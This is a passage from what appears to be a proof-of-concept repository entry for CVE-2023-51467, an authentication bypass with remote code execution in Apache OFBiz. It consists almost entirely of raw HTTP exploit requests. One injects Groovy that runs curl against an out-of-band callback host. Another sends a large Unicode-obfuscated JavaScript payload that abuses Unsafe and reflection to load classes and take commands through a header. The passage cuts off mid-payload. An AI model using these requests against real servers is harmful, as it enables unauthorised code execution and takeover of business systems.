+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Referer: https://127.0.0.1:8443/accounting/control/main
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 166
+Origin: https://127.0.0.1:8443
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+
+groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22curl+CVE-2023-51467.xxxxxx.ceye.io%22.execute%28%29%27%29
+```
+
+
+![c930c2bb7200a1868dad8c9d1e58cf38](https://github.com/wy876/POC/assets/139549762/b516c218-f05a-45f9-974e-be96acd0a93c)
+
+## exp
+```
+POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
+Host: 127.0.0.1:28080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Cmd: id
+Content-Length: 41
+
+groovyProgram=\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u0078\u002e\u0073\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0063\u0072\u0069\u0070\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u004d\u0061\u006e\u0061\u0067\u0065\u0072\u0028\u0029\u002e\u0067\u0065\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u0042\u0079\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0073\u0022\u0029\u002e\u0065\u0076\u0061\u006c\u0028\u0022\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u006c\u006f\u0061\u0064\u0028\u005c\u0022\u006e\u0061\u0073\u0068\u006f\u0072\u006e\u003a\u006d\u006f\u007a\u0069\u006c\u006c\u0061\u005f\u0063\u006f\u006d\u0070\u0061\u0074\u002e\u006a\u0073\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0029\u0020\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0055\u006e\u0073\u0061\u0066\u0065\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0020\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0067\u0065\u0074\u0028\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u0063\u006c\u0061\u007a\u007a\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0043\u006c\u0061\u0073\u0073\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0062\u0079\u0070\u0061\u0073\u0073\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0046\u0069\u006c\u0074\u0065\u0072\u0028\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0064\u006b\u002e\u0069\u006e\u0074\u0065\u0072\u006e\u0061\u006c\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0072\u0072\u006f\u0072\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u002c\u0020\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u0069\u0067\u006e\u0061\u0062\u006c\u0065\u0046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u0069\u0067\u006e\u0061\u0062\u006c\u0065\u0046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u0042\u006f\u006f\u006c\u0065\u0061\u006e\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u002c\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u002c\u0020\u0074\u0072\u0075\u0065\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0079\u0074\u0065\u0073\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u006e\u0075\u006c\u006c\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0055\u0052\u004c\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0072\u0072\u0061\u0079\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0055\u0052\u004c\u005c\u0022\u0029\u002c\u0020\u0030\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u